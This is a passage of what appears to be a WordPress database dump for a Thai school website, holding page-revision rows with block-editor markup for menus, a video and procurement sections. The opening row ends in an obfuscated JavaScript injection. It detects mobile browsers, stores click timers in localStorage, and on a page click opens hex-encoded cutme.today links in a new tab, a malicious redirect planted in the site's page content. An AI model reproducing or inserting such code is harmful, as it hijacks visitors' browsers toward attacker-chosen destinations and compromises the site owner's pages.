wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-23 10:08:57','2024-08-23 03:08:57','',19,'http://watprato.ssk.in.th/?p=197',0,'revision','',0),
(199,2,'2024-08-23 14:22:37','2024-08-23 07:22:37','','EIT_QRCode','','inherit','open','closed','','eit_qrcode','','','2024-08-23 14:22:37','2024-08-23 07:22:37','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode.png',0,'attachment','image/png',0),
(200,2,'2024-08-23 14:26:16','2024-08-23 07:26:16','','EIT_QRCode','','inherit','open','closed','','eit_qrcode-2','','','2024-08-23 14:26:16','2024-08-23 07:26:16','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png',0,'attachment','image/png',0),
(201,2,'2024-08-23 14:27:35','2024-08-23 07:27:35','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 